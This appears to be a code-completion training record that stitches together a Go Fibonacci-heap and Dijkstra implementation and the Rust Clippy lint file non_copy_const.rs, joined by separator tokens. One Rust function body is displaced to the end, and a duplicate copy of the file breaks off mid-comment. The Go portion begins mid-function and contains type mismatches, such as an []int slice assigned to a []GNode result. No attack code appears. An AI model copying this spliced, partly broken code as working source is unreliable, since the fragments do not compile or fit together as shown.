return IntPair{-1e9, -Inf}
}
type Edge struct {
From GNode
To GNode
Cost int64
}
const Inf = 1e18
type Graph struct {
Size int
edges map[GNode][]IntPair
}
func (g *Graph) AddEdge(e Edge) {
if g.Size == 0 || g.edges == nil {
g.init()
}
if g.edges[e.From] == nil {
g.edges[e.From] = make([]IntPair, 0)
}
if g.edges[e.To] == nil {
g.edges[e.To] = make([]IntPair, 0)
}
g.edges[e.From] = append(g.edges[e.From], IntPair{e.To, e.Cost})
g.edges[e.To] = append(g.edges[e.To], IntPair{e.From, e.Cost})
}
func (g *Graph) init() {
g.edges = make(map[GNode][]IntPair)
}
func DijkstraHeap(g *Graph, start int) (dist []int64, p []GNode) {
dist = make([]int64, g.Size+1)
p = make([]int, g.Size+1)
for i := range dist {
dist[i] = Inf
}
dist[start] = 0
heap := FibonacciHeap{}
heap.Insert(IntPair{start, 0})
for !heap.IsEmpty() {
var cur IntPair
tmp, _ := heap.ExtractMin()
cur = tmp.(IntPair)
v := cur.first
for _, pair := range g.edges[v] {
to := pair.first
cost := pair.second
if dist[to] > dist[v]+cost {
heap.DeleteKey(IntPair{to, dist[to]})
dist[to] = dist[v] + cost
p[to] = v
heap.Insert(IntPair{to, dist[to]})
}
}
}
return
}
func ShortestPathHeap(g *Graph, start int, finish int) (dist int64, path []GNode) {
d, pr := DijkstraHeap(g, start)
dist = d[finish]
if dist == Inf {
return
}
path = make([]GNode, 0)
path = append(path, finish)
for start != finish {
finish = pr[finish]
path = append(path, finish)
}
for i, j := 0, len(path)-1; i < j; i, j = i+1, j-1 {
path[i], path[j] = path[j], path[i]
}
return
}
//Value is an interface every heap value must implement
//Three self-explanatory methods
type Value interface {
LessThen(j interface{}) bool
EqualsTo(j interface{}) bool
MinusInf() Value
}
//Node is a struct for node, all Values need to implement Value interface
type Node struct {
key Value
parent *Node
child *Node //Only one child, we can iterate children cyclical using left right pointers
left *Node //Cyclic doubly-linked-list
right *Node
degree int //Number of child ren
marked bool //If we already cut this node's child
}
//FibonacciHeap is represented with pointer to minimum, size
//and hashmap (value, pointer to node with that value)
//THAT MEANS TO USE DECREASE CORRECTLY YOU NEED UNIQUE ENTIES
//It could be done with some sort of hashes in your structure
type FibonacciHeap struct {
min *Node
size int
nodes map[Value]*Node
}
//Decrease method accepts old and new value and changes that in heap
//If there is no entry that matches OR new value is bigger than old
//A not-nil error is returned
func (f *FibonacciHeap) Decrease(x Value, newVal Value) error {
if f.nodes[x] == nil {
return errors.New("no such element in heap")
}
if !newVal.LessThen(x) && !newVal.EqualsTo(x) {
return errors.New("cannot increase element")
}
node := f.nodes[x]
delete(f.nodes, x) //Delete entry from map and put updated one
f.nodes[newVal] = node
node.key = newVal
if node.parent == nil || node.parent.key.LessThen(newVal) { //If it is root or we don't break the heap
f.updateMin(node)
return nil //Update minimum and return
}
parent := node.parent
f.cut(node) //Cut the subtree out and make it a new root
f.cascadingCut(parent) //Do it with all parents if needed
return nil
}
//cascadingCut is a method that goes up a heap,
//and cuts every parent who is <b>marked</b>
func (f *FibonacciHeap) cascadingCut(node *Node) {
for node.parent != nil && node.marked {
parent := node.parent
f.cut(node)
node = parent
}
if node.parent != nil {
node.marked = true
f.updateMin(node.parent)
}
f.updateMin(node)
}
//cut is a method to cut out a sub-heap from parent
//and take it out to roots level
func (f *FibonacciHeap) cut(node *Node) {
node.left.right, node.right.left = node.right, node.left //cut the node from linked list
node.parent.degree--
if node.parent.child == node { //If this node is the main child, we need to make a new main child
if node.parent.degree == 0 {
node.parent.child = nil
} else {
node.parent.child = node.right
}
}
node.left, node.right = node, node //inserting node into top level linked list
node.parent = nil
f.uniteLists(f.min, node)
f.updateMin(node)
}
//DeleteKey accepts a Value to delete
//It is very simple - just Decrease the needed Value
//And ExtractMin-s it
func (f *FibonacciHeap) DeleteKey(x Value) error {
err := f.Decrease(x, x.MinusInf())
if err != nil {
return err
}
_, err = f.ExtractMin()
return err
}
//FindMin returns the minimum value of the heap
//Just returning the pointer to min
func (f *FibonacciHeap) FindMin() (Value, error) {
if !f.IsEmpty() {
return f.min.key, nil
} else {
return nil, errors.New("unable to get minimum from an empty heap")
}
}
//Insert inserts certain Value into heap
//By just inserting it into root-level linked-list
//To the right from minimum
func (f *FibonacciHeap) Insert(x Value) {
if f.IsEmpty() {
f.init()
f.min.key = x
f.min.left, f.min.right = f.min, f.min
f.nodes[x] = f.min
} else {
newNode := &Node{x, nil, nil, f.min, f.min.right, 0, false} //Create a new node
f.min.right.left = newNode
f.min.right = newNode
f.updateMin(newNode)
f.nodes[x] = newNode
}
f.size++
}
//ExtractMin deletes the minimum value of the heap and returns it
//If heap is empty there comes an error
//Implementation is not that simple, we cut all children
//and make them new roots, after that we need to rebuild out heap
//with consolidate method
func (f *FibonacciHeap) ExtractMin() (Value, error) {
if f.IsEmpty() {
return nil, errors.New("unable to get minimum from an empty heap")
}
res := f.min.key
delete(f.nodes, f.min.key)
if f.GetSize() == 1 { //If it was the only node return
f.min = nil
f.size = 0
return res, nil
}
f.cutChildren(f.min, f.min.child)
f.min.left.right = f.min.right
f.min.right.left = f.min.left
f.min = f.min.right //Move min pointer to the right, consolidation will fin new min
f.consolidate()
f.size--
return res, nil
}
//cutChildren is a fun-named method that cuts children from parent
//It iterates throw all children to invalidate parent pointer
//And then just makes them new roots
func (f *FibonacciHeap) cutChildren(father *Node, child *Node) {
if child == nil {
return
}
start := child
start.parent = nil
cur := child.right
for cur != start {
cur.parent = nil
cur = cur.right
}
father.child = nil
f.uniteLists(father, child)
}
//consolidate is a heavy O(log n) function
//What it does is just find two root trees with same degree
//And then hang the bigger (by node.key) one to smaller
func (f *FibonacciHeap) consolidate() {
var used = make([]*Node, f.size) //We use a slice to track collisions in node.degree
used[f.min.degree] = f.min
cur := f.min.right
for used[cur.degree] != cur { //We always go right, so if we placed something to slice, made a lap, and nothing changed, consolidation is finished
f.updateMin(cur)
if used[cur.degree] == nil { //If yet no other node with same degree recorder - record current
used[cur.degree] = cur
cur = cur.right
} else {
busy := used[cur.degree]
father, son := cur, busy
if busy.key.LessThen(cur.key) { //make father point to lighter node, son to heavier one
father, son = son, father
} else if father.key.EqualsTo(son.key) { //make sure f.min is always father
if son == f.min {
father, son = son, father
}
}
son.left.right = son.right
son.right.left = son.left //cut the son from his local linked-list
next := cur.right //remember next to be right from current cur, it can change later
if father.child == nil { //If father has no children - son is the first
father.child = son
son.left, son.right = son, son
} else { //else integrate son into children linked-list
son.left, son.right = father.child, father.child.right
father.child.right.left = son
father.child.right = son
}
used[cur.degree] = nil
son.parent = father
father.degree++
cur = next
}
f.updateMin(cur)
}
}
func (f *FibonacciHeap) updateMin(comp *Node) {
if comp.key.LessThen(f.min.key) {
f.min = comp
return
}
if comp.key.EqualsTo(f.min.key) {
if comp.parent == nil && f.min.parent != nil {
f.min = comp
return
}
for f.min.parent != nil {
f.min = f.min.parent
}
}
}
//Merge just merges two fibonacci heaps together
//It could be O(1) if we dont need to hold relevant hashmap
//That helps to do search in O(1)*
func (f *FibonacciHeap) Merge(heap *FibonacciHeap) {
if heap.size == 0 {
return
}
if f.size == 0 { //if our heap is zero-sized, just change pointers to another list
f.min = heap.min
f.size = heap.size
} else {
f.uniteLists(f.min, heap.min) //Unites two lists
f.size += heap.size
f.updateMin(heap.min)
}
for k, v := range heap.nodes { //O(n) code here!!
f.nodes[k] = v
}
}
//uniteLists is simple function that unites two cyclic doubly-linked-lists into one
func (f *FibonacciHeap) uniteLists(first *Node, second *Node) {
if second == nil || first == nil {
return
}
first.left.right = second.right
second.right.left = first.left
first.left = second
second.right = first
} |
//IsEmpty returns true if fibheap is empty
func (f *FibonacciHeap) IsEmpty() bool {
return f.size == 0
}
//init function creates an empty node and initialize hashmap
func (f *FibonacciHeap) init() {
f.min = &(Node{})
f.nodes = make(map[Value]*Node)
f.size = 0
} |
//GetSize returns current size of the heap (number of nodes)
func (f *FibonacciHeap) GetSize() int {
return f.size
} | random_line_split |
non_copy_const.rs | //! Checks for uses of const which the type is not `Freeze` (`Cell`-free).
//!
//! This lint is **warn** by default.
use std::ptr;
use clippy_utils::diagnostics::span_lint_and_then;
use clippy_utils::in_constant;
use if_chain::if_chain;
use rustc_hir::def::{DefKind, Res};
use rustc_hir::def_id::DefId;
use rustc_hir::{
BodyId, Expr, ExprKind, HirId, Impl, ImplItem, ImplItemKind, Item, ItemKind, Node, TraitItem, TraitItemKind, UnOp,
};
use rustc_infer::traits::specialization_graph;
use rustc_lint::{LateContext, LateLintPass, Lint};
use rustc_middle::mir::interpret::{ConstValue, ErrorHandled};
use rustc_middle::ty::adjustment::Adjust;
use rustc_middle::ty::{self, AssocKind, Const, Ty};
use rustc_session::{declare_lint_pass, declare_tool_lint};
use rustc_span::{InnerSpan, Span, DUMMY_SP};
use rustc_typeck::hir_ty_to_ty;
// FIXME: this is a correctness problem but there's no suitable
// warn-by-default category.
declare_clippy_lint! {
/// ### What it does
/// Checks for declaration of `const` items which is interior
/// mutable (e.g., contains a `Cell`, `Mutex`, `AtomicXxxx`, etc.).
///
/// ### Why is this bad?
/// Consts are copied everywhere they are referenced, i.e.,
/// every time you refer to the const a fresh instance of the `Cell` or `Mutex`
/// or `AtomicXxxx` will be created, which defeats the whole purpose of using
/// these types in the first place.
///
/// The `const` should better be replaced by a `static` item if a global
/// variable is wanted, or replaced by a `const fn` if a constructor is wanted.
///
/// ### Known problems
/// A "non-constant" const item is a legacy way to supply an
/// initialized value to downstream `static` items (e.g., the
/// `std::sync::ONCE_INIT` constant). In this case the use of `const` is legit,
/// and this lint should be suppressed.
///
/// Even though the lint avoids triggering on a constant whose type has enums that have variants
/// with interior mutability, and its value uses non interior mutable variants (see
/// [#3962](https://github.com/rust-lang/rust-clippy/issues/3962) and
/// [#3825](https://github.com/rust-lang/rust-clippy/issues/3825) for examples);
/// it complains about associated constants without default values only based on its types;
/// which might not be preferable.
/// There're other enums plus associated constants cases that the lint cannot handle.
///
/// Types that have underlying or potential interior mutability trigger the lint whether
/// the interior mutable field is used or not. See issues
/// [#5812](https://github.com/rust-lang/rust-clippy/issues/5812) and
///
/// ### Example
/// ```rust
/// use std::sync::atomic::{AtomicUsize, Ordering::SeqCst};
///
/// // Bad.
/// const CONST_ATOM: AtomicUsize = AtomicUsize::new(12);
/// CONST_ATOM.store(6, SeqCst); // the content of the atomic is unchanged
/// assert_eq!(CONST_ATOM.load(SeqCst), 12); // because the CONST_ATOM in these lines are distinct
///
/// // Good.
/// static STATIC_ATOM: AtomicUsize = AtomicUsize::new(15);
/// STATIC_ATOM.store(9, SeqCst);
/// assert_eq!(STATIC_ATOM.load(SeqCst), 9); // use a `static` item to refer to the same instance
/// ```
#[clippy::version = "pre 1.29.0"]
pub DECLARE_INTERIOR_MUTABLE_CONST,
style,
"declaring `const` with interior mutability"
}
// FIXME: this is a correctness problem but there's no suitable
// warn-by-default category.
declare_clippy_lint! {
/// ### What it does
/// Checks if `const` items which is interior mutable (e.g.,
/// contains a `Cell`, `Mutex`, `AtomicXxxx`, etc.) has been borrowed directly.
///
/// ### Why is this bad?
/// Consts are copied everywhere they are referenced, i.e.,
/// every time you refer to the const a fresh instance of the `Cell` or `Mutex`
/// or `AtomicXxxx` will be created, which defeats the whole purpose of using
/// these types in the first place.
///
/// The `const` value should be stored inside a `static` item.
///
/// ### Known problems
/// When an enum has variants with interior mutability, use of its non
/// interior mutable variants can generate false positives. See issue
/// [#3962](https://github.com/rust-lang/rust-clippy/issues/3962)
///
/// Types that have underlying or potential interior mutability trigger the lint whether
/// the interior mutable field is used or not. See issues
/// [#5812](https://github.com/rust-lang/rust-clippy/issues/5812) and
/// [#3825](https://github.com/rust-lang/rust-clippy/issues/3825)
///
/// ### Example
/// ```rust
/// use std::sync::atomic::{AtomicUsize, Ordering::SeqCst};
/// const CONST_ATOM: AtomicUsize = AtomicUsize::new(12);
///
/// // Bad.
/// CONST_ATOM.store(6, SeqCst); // the content of the atomic is unchanged
/// assert_eq!(CONST_ATOM.load(SeqCst), 12); // because the CONST_ATOM in these lines are distinct
///
/// // Good.
/// static STATIC_ATOM: AtomicUsize = CONST_ATOM;
/// STATIC_ATOM.store(9, SeqCst);
/// assert_eq!(STATIC_ATOM.load(SeqCst), 9); // use a `static` item to refer to the same instance
/// ```
#[clippy::version = "pre 1.29.0"]
pub BORROW_INTERIOR_MUTABLE_CONST,
style,
"referencing `const` with interior mutability"
}
fn is_unfrozen<'tcx>(cx: &LateContext<'tcx>, ty: Ty<'tcx>) -> bool {
// Ignore types whose layout is unknown since `is_freeze` reports every generic types as `!Freeze`,
// making it indistinguishable from `UnsafeCell`. i.e. it isn't a tool to prove a type is
// 'unfrozen'. However, this code causes a false negative in which
// a type contains a layout-unknown type, but also an unsafe cell like `const CELL: Cell<T>`.
// Yet, it's better than `ty.has_type_flags(TypeFlags::HAS_TY_PARAM | TypeFlags::HAS_PROJECTION)`
// since it works when a pointer indirection involves (`Cell<*const T>`).
// Making up a `ParamEnv` where every generic params and assoc types are `Freeze`is another option;
// but I'm not sure whether it's a decent way, if possible.
cx.tcx.layout_of(cx.param_env.and(ty)).is_ok() && !ty.is_freeze(cx.tcx.at(DUMMY_SP), cx.param_env)
}
fn is_value_unfrozen_raw<'tcx>(
cx: &LateContext<'tcx>,
result: Result<ConstValue<'tcx>, ErrorHandled>,
ty: Ty<'tcx>,
) -> bool {
fn inner<'tcx>(cx: &LateContext<'tcx>, val: &'tcx Const<'tcx>) -> bool {
match val.ty.kind() {
// the fact that we have to dig into every structs to search enums
// leads us to the point checking `UnsafeCell` directly is the only option.
ty::Adt(ty_def, ..) if Some(ty_def.did) == cx.tcx.lang_items().unsafe_cell_type() => true,
ty::Array(..) | ty::Adt(..) | ty::Tuple(..) => {
let val = cx.tcx.destructure_const(cx.param_env.and(val));
val.fields.iter().any(|field| inner(cx, field))
},
_ => false,
}
}
result.map_or_else(
|err| {
// Consider `TooGeneric` cases as being unfrozen.
// This causes a false positive where an assoc const whose type is unfrozen
// have a value that is a frozen variant with a generic param (an example is
// `declare_interior_mutable_const::enums::BothOfCellAndGeneric::GENERIC_VARIANT`).
// However, it prevents a number of false negatives that is, I think, important:
// 1. assoc consts in trait defs referring to consts of themselves
// (an example is `declare_interior_mutable_const::traits::ConcreteTypes::ANOTHER_ATOMIC`).
// 2. a path expr referring to assoc consts whose type is doesn't have
// any frozen variants in trait defs (i.e. without substitute for `Self`).
// (e.g. borrowing `borrow_interior_mutable_const::trait::ConcreteTypes::ATOMIC`)
// 3. similar to the false positive above;
// but the value is an unfrozen variant, or the type has no enums. (An example is
// `declare_interior_mutable_const::enums::BothOfCellAndGeneric::UNFROZEN_VARIANT`
// and `declare_interior_mutable_const::enums::BothOfCellAndGeneric::NO_ENUM`).
// One might be able to prevent these FNs correctly, and replace this with `false`;
// e.g. implementing `has_frozen_variant` described above, and not running this function
// when the type doesn't have any frozen variants would be the 'correct' way for the 2nd
// case (that actually removes another suboptimal behavior (I won't say 'false positive') where,
// similar to 2., but with the a frozen variant) (e.g. borrowing
// `borrow_interior_mutable_const::enums::AssocConsts::TO_BE_FROZEN_VARIANT`).
// I chose this way because unfrozen enums as assoc consts are rare (or, hopefully, none).
err == ErrorHandled::TooGeneric
},
|val| inner(cx, Const::from_value(cx.tcx, val, ty)),
)
}
fn is_value_unfrozen_poly<'tcx>(cx: &LateContext<'tcx>, body_id: BodyId, ty: Ty<'tcx>) -> bool {
let result = cx.tcx.const_eval_poly(body_id.hir_id.owner.to_def_id());
is_value_unfrozen_raw(cx, result, ty)
}
fn is_value_unfrozen_expr<'tcx>(cx: &LateContext<'tcx>, hir_id: HirId, def_id: DefId, ty: Ty<'tcx>) -> bool {
let substs = cx.typeck_results().node_substs(hir_id);
let result = cx.tcx.const_eval_resolve(
cx.param_env,
ty::Unevaluated::new(ty::WithOptConstParam::unknown(def_id), substs),
None,
);
is_value_unfrozen_raw(cx, result, ty)
}
#[derive(Copy, Clone)]
enum Source {
Item { item: Span },
Assoc { item: Span },
Expr { expr: Span },
}
impl Source {
#[must_use]
fn lint(&self) -> (&'static Lint, &'static str, Span) {
match self {
Self::Item { item } | Self::Assoc { item, .. } => (
DECLARE_INTERIOR_MUTABLE_CONST,
"a `const` item should never be interior mutable",
*item,
),
Self::Expr { expr } => (
BORROW_INTERIOR_MUTABLE_CONST,
"a `const` item with interior mutability should not be borrowed",
*expr,
),
}
}
}
fn lint(cx: &LateContext<'_>, source: Source) {
let (lint, msg, span) = source.lint();
span_lint_and_then(cx, lint, span, msg, |diag| {
if span.from_expansion() {
return; // Don't give suggestions into macros.
}
match source {
Source::Item { .. } => {
let const_kw_span = span.from_inner(InnerSpan::new(0, 5));
diag.span_label(const_kw_span, "make this a static item (maybe with lazy_static)");
},
Source::Assoc { .. } => (),
Source::Expr { .. } => {
diag.help("assign this const to a local or static variable, and use the variable here");
},
}
});
}
declare_lint_pass!(NonCopyConst => [DECLARE_INTERIOR_MUTABLE_CONST, BORROW_INTERIOR_MUTABLE_CONST]);
impl<'tcx> LateLintPass<'tcx> for NonCopyConst {
fn check_item(&mut self, cx: &LateContext<'tcx>, it: &'tcx Item<'_>) {
if let ItemKind::Const(hir_ty, body_id) = it.kind {
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
if is_unfrozen(cx, ty) && is_value_unfrozen_poly(cx, body_id, ty) {
lint(cx, Source::Item { item: it.span });
}
}
}
fn check_trait_item(&mut self, cx: &LateContext<'tcx>, trait_item: &'tcx TraitItem<'_>) {
if let TraitItemKind::Const(hir_ty, body_id_opt) = &trait_item.kind {
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
// Normalize assoc types because ones originated from generic params
// bounded other traits could have their bound.
let normalized = cx.tcx.normalize_erasing_regions(cx.param_env, ty);
if is_unfrozen(cx, normalized)
// When there's no default value, lint it only according to its type;
// in other words, lint consts whose value *could* be unfrozen, not definitely is.
// This feels inconsistent with how the lint treats generic types,
// which avoids linting types which potentially become unfrozen.
// One could check whether an unfrozen type have a *frozen variant*
// (like `body_id_opt.map_or_else(|| !has_frozen_variant(...), ...)`),
// and do the same as the case of generic types at impl items.
// Note that it isn't sufficient to check if it has an enum
// since all of that enum's variants can be unfrozen:
// i.e. having an enum doesn't necessary mean a type has a frozen variant.
// And, implementing it isn't a trivial task; it'll probably end up
// re-implementing the trait predicate evaluation specific to `Freeze`.
&& body_id_opt.map_or(true, |body_id| is_value_unfrozen_poly(cx, body_id, normalized))
{
lint(cx, Source::Assoc { item: trait_item.span });
}
}
}
fn check_impl_item(&mut self, cx: &LateContext<'tcx>, impl_item: &'tcx ImplItem<'_>) |
fn check_expr(&mut self, cx: &LateContext<'tcx>, expr: &'tcx Expr<'_>) {
if let ExprKind::Path(qpath) = &expr.kind {
// Only lint if we use the const item inside a function.
if in_constant(cx, expr.hir_id) {
return;
}
// Make sure it is a const item.
let item_def_id = match cx.qpath_res(qpath, expr.hir_id) {
Res::Def(DefKind::Const | DefKind::AssocConst, did) => did,
_ => return,
};
// Climb up to resolve any field access and explicit referencing.
let mut cur_expr = expr;
let mut dereferenced_expr = expr;
let mut needs_check_adjustment = true;
loop {
let parent_id = cx.tcx.hir().get_parent_node(cur_expr.hir_id);
if parent_id == cur_expr.hir_id {
break;
}
if let Some(Node::Expr(parent_expr)) = cx.tcx.hir().find(parent_id) {
match &parent_expr.kind {
ExprKind::AddrOf(..) => {
// `&e` => `e` must be referenced.
needs_check_adjustment = false;
},
ExprKind::Field(..) => {
needs_check_adjustment = true;
// Check whether implicit dereferences happened;
// if so, no need to go further up
// because of the same reason as the `ExprKind::Unary` case.
if cx
.typeck_results()
.expr_adjustments(dereferenced_expr)
.iter()
.any(|adj| matches!(adj.kind, Adjust::Deref(_)))
{
break;
}
dereferenced_expr = parent_expr;
},
ExprKind::Index(e, _) if ptr::eq(&**e, cur_expr) => {
// `e[i]` => desugared to `*Index::index(&e, i)`,
// meaning `e` must be referenced.
// no need to go further up since a method call is involved now.
needs_check_adjustment = false;
break;
},
ExprKind::Unary(UnOp::Deref, _) => {
// `*e` => desugared to `*Deref::deref(&e)`,
// meaning `e` must be referenced.
// no need to go further up since a method call is involved now.
needs_check_adjustment = false;
break;
},
_ => break,
}
cur_expr = parent_expr;
} else {
break;
}
}
let ty = if needs_check_adjustment {
let adjustments = cx.typeck_results().expr_adjustments(dereferenced_expr);
if let Some(i) = adjustments
.iter()
.position(|adj| matches!(adj.kind, Adjust::Borrow(_) | Adjust::Deref(_)))
{
if i == 0 {
cx.typeck_results().expr_ty(dereferenced_expr)
} else {
adjustments[i - 1].target
}
} else {
// No borrow adjustments means the entire const is moved.
return;
}
} else {
cx.typeck_results().expr_ty(dereferenced_expr)
};
if is_unfrozen(cx, ty) && is_value_unfrozen_expr(cx, expr.hir_id, item_def_id, ty) {
lint(cx, Source::Expr { expr: expr.span });
}
}
}
}
| {
if let ImplItemKind::Const(hir_ty, body_id) = &impl_item.kind {
let item_hir_id = cx.tcx.hir().get_parent_node(impl_item.hir_id());
let item = cx.tcx.hir().expect_item(item_hir_id);
match &item.kind {
ItemKind::Impl(Impl {
of_trait: Some(of_trait_ref),
..
}) => {
if_chain! {
// Lint a trait impl item only when the definition is a generic type,
// assuming an assoc const is not meant to be an interior mutable type.
if let Some(of_trait_def_id) = of_trait_ref.trait_def_id();
if let Some(of_assoc_item) = specialization_graph::Node::Trait(of_trait_def_id)
.item(cx.tcx, impl_item.ident, AssocKind::Const, of_trait_def_id);
if cx
.tcx
.layout_of(cx.tcx.param_env(of_trait_def_id).and(
// Normalize assoc types because ones originated from generic params
// bounded other traits could have their bound at the trait defs;
// and, in that case, the definition is *not* generic.
cx.tcx.normalize_erasing_regions(
cx.tcx.param_env(of_trait_def_id),
cx.tcx.type_of(of_assoc_item.def_id),
),
))
.is_err();
// If there were a function like `has_frozen_variant` described above,
// we should use here as a frozen variant is a potential to be frozen
// similar to unknown layouts.
// e.g. `layout_of(...).is_err() || has_frozen_variant(...);`
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
let normalized = cx.tcx.normalize_erasing_regions(cx.param_env, ty);
if is_unfrozen(cx, normalized);
if is_value_unfrozen_poly(cx, *body_id, normalized);
then {
lint(
cx,
Source::Assoc {
item: impl_item.span,
},
);
}
}
},
ItemKind::Impl(Impl { of_trait: None, .. }) => {
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
// Normalize assoc types originated from generic params.
let normalized = cx.tcx.normalize_erasing_regions(cx.param_env, ty);
if is_unfrozen(cx, ty) && is_value_unfrozen_poly(cx, *body_id, normalized) {
lint(cx, Source::Assoc { item: impl_item.span });
}
},
_ => (),
}
}
} | identifier_body |
non_copy_const.rs | //! Checks for uses of const which the type is not `Freeze` (`Cell`-free).
//!
//! This lint is **warn** by default.
use std::ptr;
use clippy_utils::diagnostics::span_lint_and_then;
use clippy_utils::in_constant;
use if_chain::if_chain;
use rustc_hir::def::{DefKind, Res};
use rustc_hir::def_id::DefId;
use rustc_hir::{
BodyId, Expr, ExprKind, HirId, Impl, ImplItem, ImplItemKind, Item, ItemKind, Node, TraitItem, TraitItemKind, UnOp,
};
use rustc_infer::traits::specialization_graph;
use rustc_lint::{LateContext, LateLintPass, Lint};
use rustc_middle::mir::interpret::{ConstValue, ErrorHandled};
use rustc_middle::ty::adjustment::Adjust;
use rustc_middle::ty::{self, AssocKind, Const, Ty};
use rustc_session::{declare_lint_pass, declare_tool_lint};
use rustc_span::{InnerSpan, Span, DUMMY_SP};
use rustc_typeck::hir_ty_to_ty;
// FIXME: this is a correctness problem but there's no suitable
// warn-by-default category.
declare_clippy_lint! {
/// ### What it does
/// Checks for declaration of `const` items which is interior
/// mutable (e.g., contains a `Cell`, `Mutex`, `AtomicXxxx`, etc.).
///
/// ### Why is this bad?
/// Consts are copied everywhere they are referenced, i.e.,
/// every time you refer to the const a fresh instance of the `Cell` or `Mutex`
/// or `AtomicXxxx` will be created, which defeats the whole purpose of using
/// these types in the first place.
///
/// The `const` should better be replaced by a `static` item if a global
/// variable is wanted, or replaced by a `const fn` if a constructor is wanted.
///
/// ### Known problems
/// A "non-constant" const item is a legacy way to supply an
/// initialized value to downstream `static` items (e.g., the
/// `std::sync::ONCE_INIT` constant). In this case the use of `const` is legit,
/// and this lint should be suppressed.
///
/// Even though the lint avoids triggering on a constant whose type has enums that have variants
/// with interior mutability, and its value uses non interior mutable variants (see
/// [#3962](https://github.com/rust-lang/rust-clippy/issues/3962) and
/// [#3825](https://github.com/rust-lang/rust-clippy/issues/3825) for examples);
/// it complains about associated constants without default values only based on its types;
/// which might not be preferable.
/// There're other enums plus associated constants cases that the lint cannot handle.
///
/// Types that have underlying or potential interior mutability trigger the lint whether
/// the interior mutable field is used or not. See issues
/// [#5812](https://github.com/rust-lang/rust-clippy/issues/5812) and
///
/// ### Example
/// ```rust
/// use std::sync::atomic::{AtomicUsize, Ordering::SeqCst};
///
/// // Bad.
/// const CONST_ATOM: AtomicUsize = AtomicUsize::new(12);
/// CONST_ATOM.store(6, SeqCst); // the content of the atomic is unchanged
/// assert_eq!(CONST_ATOM.load(SeqCst), 12); // because the CONST_ATOM in these lines are distinct
///
/// // Good.
/// static STATIC_ATOM: AtomicUsize = AtomicUsize::new(15);
/// STATIC_ATOM.store(9, SeqCst);
/// assert_eq!(STATIC_ATOM.load(SeqCst), 9); // use a `static` item to refer to the same instance
/// ```
#[clippy::version = "pre 1.29.0"]
pub DECLARE_INTERIOR_MUTABLE_CONST,
style,
"declaring `const` with interior mutability"
}
// FIXME: this is a correctness problem but there's no suitable
// warn-by-default category.
declare_clippy_lint! {
/// ### What it does
/// Checks if `const` items which is interior mutable (e.g.,
/// contains a `Cell`, `Mutex`, `AtomicXxxx`, etc.) has been borrowed directly.
///
/// ### Why is this bad?
/// Consts are copied everywhere they are referenced, i.e.,
/// every time you refer to the const a fresh instance of the `Cell` or `Mutex`
/// or `AtomicXxxx` will be created, which defeats the whole purpose of using
/// these types in the first place.
///
/// The `const` value should be stored inside a `static` item.
///
/// ### Known problems
/// When an enum has variants with interior mutability, use of its non
/// interior mutable variants can generate false positives. See issue
/// [#3962](https://github.com/rust-lang/rust-clippy/issues/3962)
///
/// Types that have underlying or potential interior mutability trigger the lint whether
/// the interior mutable field is used or not. See issues
/// [#5812](https://github.com/rust-lang/rust-clippy/issues/5812) and
/// [#3825](https://github.com/rust-lang/rust-clippy/issues/3825)
///
/// ### Example
/// ```rust
/// use std::sync::atomic::{AtomicUsize, Ordering::SeqCst};
/// const CONST_ATOM: AtomicUsize = AtomicUsize::new(12);
///
/// // Bad.
/// CONST_ATOM.store(6, SeqCst); // the content of the atomic is unchanged
/// assert_eq!(CONST_ATOM.load(SeqCst), 12); // because the CONST_ATOM in these lines are distinct
///
/// // Good.
/// static STATIC_ATOM: AtomicUsize = CONST_ATOM;
/// STATIC_ATOM.store(9, SeqCst);
/// assert_eq!(STATIC_ATOM.load(SeqCst), 9); // use a `static` item to refer to the same instance
/// ```
#[clippy::version = "pre 1.29.0"]
pub BORROW_INTERIOR_MUTABLE_CONST,
style,
"referencing `const` with interior mutability"
}
fn is_unfrozen<'tcx>(cx: &LateContext<'tcx>, ty: Ty<'tcx>) -> bool {
// Ignore types whose layout is unknown since `is_freeze` reports every generic types as `!Freeze`,
// making it indistinguishable from `UnsafeCell`. i.e. it isn't a tool to prove a type is
// 'unfrozen'. However, this code causes a false negative in which
// a type contains a layout-unknown type, but also an unsafe cell like `const CELL: Cell<T>`.
// Yet, it's better than `ty.has_type_flags(TypeFlags::HAS_TY_PARAM | TypeFlags::HAS_PROJECTION)`
// since it works when a pointer indirection involves (`Cell<*const T>`).
// Making up a `ParamEnv` where every generic params and assoc types are `Freeze`is another option;
// but I'm not sure whether it's a decent way, if possible.
cx.tcx.layout_of(cx.param_env.and(ty)).is_ok() && !ty.is_freeze(cx.tcx.at(DUMMY_SP), cx.param_env)
}
fn is_value_unfrozen_raw<'tcx>(
cx: &LateContext<'tcx>,
result: Result<ConstValue<'tcx>, ErrorHandled>,
ty: Ty<'tcx>,
) -> bool {
fn inner<'tcx>(cx: &LateContext<'tcx>, val: &'tcx Const<'tcx>) -> bool {
match val.ty.kind() {
// the fact that we have to dig into every structs to search enums
// leads us to the point checking `UnsafeCell` directly is the only option.
ty::Adt(ty_def, ..) if Some(ty_def.did) == cx.tcx.lang_items().unsafe_cell_type() => true,
ty::Array(..) | ty::Adt(..) | ty::Tuple(..) => {
let val = cx.tcx.destructure_const(cx.param_env.and(val));
val.fields.iter().any(|field| inner(cx, field))
},
_ => false,
}
}
result.map_or_else(
|err| {
// Consider `TooGeneric` cases as being unfrozen.
// This causes a false positive where an assoc const whose type is unfrozen
// have a value that is a frozen variant with a generic param (an example is
// `declare_interior_mutable_const::enums::BothOfCellAndGeneric::GENERIC_VARIANT`).
// However, it prevents a number of false negatives that is, I think, important:
// 1. assoc consts in trait defs referring to consts of themselves
// (an example is `declare_interior_mutable_const::traits::ConcreteTypes::ANOTHER_ATOMIC`).
// 2. a path expr referring to assoc consts whose type is doesn't have
// any frozen variants in trait defs (i.e. without substitute for `Self`).
// (e.g. borrowing `borrow_interior_mutable_const::trait::ConcreteTypes::ATOMIC`)
// 3. similar to the false positive above;
// but the value is an unfrozen variant, or the type has no enums. (An example is
// `declare_interior_mutable_const::enums::BothOfCellAndGeneric::UNFROZEN_VARIANT`
// and `declare_interior_mutable_const::enums::BothOfCellAndGeneric::NO_ENUM`).
// One might be able to prevent these FNs correctly, and replace this with `false`;
// e.g. implementing `has_frozen_variant` described above, and not running this function
// when the type doesn't have any frozen variants would be the 'correct' way for the 2nd
// case (that actually removes another suboptimal behavior (I won't say 'false positive') where,
// similar to 2., but with the a frozen variant) (e.g. borrowing
